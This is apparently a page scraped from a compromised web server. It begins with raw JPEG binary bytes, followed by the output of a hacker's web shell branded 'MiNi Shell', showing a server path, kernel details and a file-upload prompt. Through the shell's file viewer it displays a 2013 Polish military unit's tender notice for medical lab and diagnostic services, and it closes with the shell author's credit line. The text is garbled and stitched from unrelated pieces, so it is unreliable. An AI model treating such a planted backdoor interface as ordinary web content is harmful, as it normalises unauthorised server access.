JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20131220/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20131220/529952-N-2013.html

<p class="kh_header"><b>Warszawa: Wykonanie usługi w zakresie badań laboratoryjnych, specjalistycznych, diagnostyki obrazowej, konsultacji specjalistycznych dotyczących  medycyny pracy  oraz dyspanseryzacji.</b><br>
<b>Numer ogłoszenia: 529952 - 2013; data zamieszczenia: 20.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa nr 4198 , ul. Żwirki i Wigury 1C, 00-909 Warszawa, woj. mazowieckie, tel. 022 6821316, faks 022 6821316.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.1blot.sp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa 4198.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie usługi w zakresie badań laboratoryjnych, specjalistycznych, diagnostyki obrazowej, konsultacji specjalistycznych dotyczących  medycyny pracy  oraz dyspanseryzacji..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonanie usługi w zakresie badań laboratoryjnych, specjalistycznych, diagnostyki obrazowej, konsultacji specjalistycznych dotyczących medycyny  pracy oraz dyspanseryzacji.
Badania wchodzące w skład usługi i ilość świadczeń w ciągu 12 miesięcy:                       
1. Badania laboratoryjne:
1). morfologia - 350;
2). morfologia z rozmazem -800;
3)  płytki krwi -800;
4). OB.- 800;
5). cukier w surowicy -500; 
6). WR - 50;
7). mocznik - 150;
8). kreatynina - 150;
9). mocz badanie ogólne - 800;
10).cholesterol - 500;
11).trójglicerydy - 500;
12). HDL - 500;
13). LDL - 500;
14). kwas moczowy - 70;
15). wskaźnik protrombinowy - 30;
16). jonogram - 100;
17). transaminazy - 800;
18). grupa krwi (bez wpisu do dokumentu) -100;
19). grupa krwi z wpisem do dokumentów -100;
20). badanie kału na nosicielstwo -70;
21). badanie kału na jaja pasożytów - 70;
22). HIV - 70;
23). HBs - 70;
24). HCV -70;
25). mocz na kwas trójchlorooctowy -10;
26). mocz na kwas deltaaminolewulinowy - 33;
27). TSH - 20;
28). bilirubina -100;
29). PSA -100;
30). ołów w surowicy -30;
31)  VDRL - 50;
32). CK-MB - 70;
33). INR -70;
34). Kał na krew utajoną - 70;
35). ASO -30;
36). RF - czynnik reumatoidalny- 30;
37)  CRP -50;

2. Badania specjalistyczne:
1). EKG +opis internistyczny - 500;
2). Echo - 50;	
3). Holter - 50;	
4). spirometria - 30;
5). audiogram - 500;
6). USG jama brzuszna- 100; 
7). EEG+opis - 20;	
8). USG poszczególnych narządów -100;
9). Próba wysiłkowa - 50;
10).Posiew plwociny- 50;
11).Posiew moczu - 50;

3. Diagnostyka obrazowa (z opisami):
1).RTG - płuc duży obrazek z opisem - 800;
2).RTG - kręgosłupa szyjnego z opisem - 40;
3).RTG - kręgosłupa piersiowego z opisem - 40;
4).RTG - kręgosłupa lędźwiowo-krzyżowego z opisem - 40;
5).RTG - innych części kostnych z opisem -40; 
6).TK kręgosłupa piersiowego z opisem -30;
7).TK kręgosłupa szyjnego z opisem - 30; 
8).TK kręgosłupa lędźwiowo-krzyżowego z opisem -30; 

4. Konsultacje specjalistyczne z zakresu:	
1).laryngologii - 400;
2).okulistyki - 300;
3).okulistyczna + wypisanie recepty na okulary - 800;
4).neurologii - 200;
5).psychiatrii - 100;
6).ortopedii - 50;
7).kardiologii - 150;
8).chirurgii - 50;
9).onkologii - 20;
10).ginekologii - 10;
11).dermatologii - 50;
12).pulmonologii - 20;
13).urologii - 70;
14).gastroenterolog + gastroskopia -30;
15).diabetologii - 30;

Wymagania Zamawiającego:
1. Termin wykonania konsultacji specjalistycznych od dnia zgłoszenia się  
    pracownika nie  może przekroczyć 1 dnia roboczego.
2. Termin pobrania badań laboratoryjnych, bądź wykonanie badań 
   specjalistycznych, diagnostyki obrazowej od dnia zgłoszenia się pracownika nie  
    przekroczy 1 dnia roboczego.
3. Ceny jednostkowe nie mogą ulec zmianie w trakcie trwania umowy.
4. Umowa obowiązywać ma do 31.12.2014 r. 
5. Wszystkie konsultacje specjalistyczne objęte zakresem umowy będą   
    wykonywane w  siedzibie  głównej Wykonawcy w dni robocze w godz. 8.00-  
    16.00.
6. Pozostałe usługi podlegające niniejszemu postępowaniu muszą być wykonywane  
    tylko na terenie m. st. Warszawy w godz. 8.00-16.00.
7.  Dostępność podwykonawców musi być taka sama jak Wykonawcy w dni  
    robocze w godz.  8.00-16.00.
8. Wykonawca zobowiązuje się do wykonania badań przez wykwalifikowany  
    personel posiadający wszelkie niezbędne uprawnienia i dysponujący wysokiej  
    jakości sprzętem medycznym.
9. Do podstawowych obowiązków Wykonawcy należy świadczenie usług z  
    najwyższą starannością, aktualną wiedzą medyczną, dostępnymi metodami i  
    środkami zapobiegania, rozpoznawania i leczenia chorób oraz zasadami etyki  
    zawodowej, respektując prawa pacjenta zgodnie z następującymi aktami    
    prawnymi:
    1) przepisami ustawy z dnia 15.04.2011 r. o działalności leczniczej (Dz. U. Nr   
        112, poz. 654);
    2) przepisami ustawy z dnia 05.12.1996 r. o zawodach lekarza i lekarza  
       dentysty (Dz. U. z 2008 r. nr 136 poz. 857 z późn. zm.);
    3) przepisami ustawy z dnia 05.07.1996 r. o zawodach pielęgniarki i  
       położnej  (Dz. U. z 2009 r. nr 151, poz. 1217 z późn. zm.).
 10. Wykonawca winien spełniać wymogi zawarte w Rozporządzeniu Ministra  
      Zdrowia  z dnia 07.01.2004 r. w sprawie badań lekarskich kierowców i osób  
      ubiegających się  o uprawnienia kierowania pojazdami (Dz. U. Nr 2, poz.15).
 11. Wykonawca winien dysponować odpowiednim zapleczem w celu zapewnienia   
      całego  pakietu usług medycznych objętych przedmiotem zamówienia.
 12.  Zamawiający wymaga, aby lekarz okulista wydawał orzeczenia o potrzebie    
      używania okularów korygujących do pracy z monitorem.
 13. Wymagane jest zaświadczenie z rejestru pomiotów wykonujących działalność  
      leczniczą.                           
 14. Wykonawca powinien posiadać wiedzę i doświadczenie tj. na potwierdzenie  
      wiedzy i doświadczenia Zamawiający wymaga załączenia wykazu  
      wykonanych, a przypadku świadczeń okresowych lub ciągłych również 
      wykonywanych usług (w zakresie niezbędnym do wykazania spełnienia warunku 
      wiedzy i doświadczenia) w okresie ostatnich trzech lat przed upływem terminu  
      składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym  
      okresie, co najmniej 2 (dwóch) usług , z podaniem ich  przedmiotu o wartości 
      co najmniej 160 000,00 zł brutto każda, dat ich wykonania i podmiotów na 
      rzecz których usługi zostały wykonane lub są wykonywane, oraz załączenie 
      dokumentu potwierdzającego, że usługi te zostały wykonane lub są  
      wykonywane należycie, dla podmiotów tworzonych i nadzorowanych przez  
      Ministra Obrony Narodowej..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 85.00.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca przedstawi zaświadczenie o wpisie do rejestru podmiotów wykonujących działalność leczniczą  z  Rejestru  Podmiotów   Wykonujących  Działalność  Leczniczą   prowadzonego  przez organ do tego uprawniony (podstawa: ustawa z dnia 15 kwietnia 2011r.  
o działalności leczniczej Dz. U. nr 112, poz. 654 z późn. zm.) wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca przedstawi wykaz  wykonanych  usług, a przypadku świadczeń okresowych lub ciągłych  
również wykonywanych usług (w zakresie niezbędnym do wykazania spełnienia 
warunku wiedzy i doświadczenia) w okresie ostatnich trzech lat przed upływem  terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym   okresie, co najmniej 2 (dwóch) usług, z podaniem ich  przedmiotu o wartości co 
 najmniej 160 000,00 zł. brutto każda, daty ich wykonania i podmiotów na rzecz 
 których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów czy zostały wykonane lub są wykonywane należcie dla podmiotów tworzonych    
 i nadzorowanych przez Ministra Obrony Narodowej zgodnie z Rozporządzeniem Ministra Obrony Narodowej z dnia 9 sierpnia 2010 r. w sprawie służby medycyny pracy w jednostkach organizacyjnych podległych Ministrowi Obrony Narodowej (Dz. U. 2010 Nr 187, poz. 1257)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków wymaganych od Wykonawców zostanie doknana   
 według formuły spełnia - nie spełnia w oparciu o złożone w ofercie dokumenty i  
 ośwadczenia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków wymaganych od Wykonawców zostanie doknana   
 według formuły spełnia - nie spełnia w oparciu o złożone w ofercie dokumenty i  
 ośwadczenia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków wymaganych od Wykonawców zostanie doknana   
 według formuły spełnia - nie spełnia w oparciu o złożone w ofercie dokumenty i  
 ośwadczenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Zaświadczenie o wpisie do rejestru podmiotów wykonujących działalność   
   leczniczą  z  Rejestru  Podmiotów   Wykonujących  Działalność  Leczniczą   
   prowadzonego  przez organ do tego uprawniony (podstawa: ustawa z dnia 15  
   kwietnia 2011r.  o działalności leczniczej Dz. U. nr 112, poz. 654 z późn. zm.)  
   wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2. Pełnomocnictwo do podpisania umowy, jesli to nie wynika z innych dokumentów  
   dołaczonych do oferty.
3. Oświadczenie Wykonawcy o przynalezności do grupy kapitałowej (art. 24 ust. 2  
     pkt 5 ustawy Prawo zamówień publicznych).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Lokalizacja - 20</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany w umowie wysokości wynagrodzenia     w kwocie  brutto, w  przypadku zmiany wysokości  stawek  podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.1blot.sp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa 4198,
Warszawa kod: 00-909 ,
ulica: Żwirki i Wigury 1 C, budynek 50, numer pokoju: 6..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.01.2014 godzina 10:00, miejsce: Jednostka Wojskowa 4198,
Warszawa kod: 00-909,
ulica: Żwirki i Wigury 1 C, budynek 51, numer pokoju: 214 - Kancelaria..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com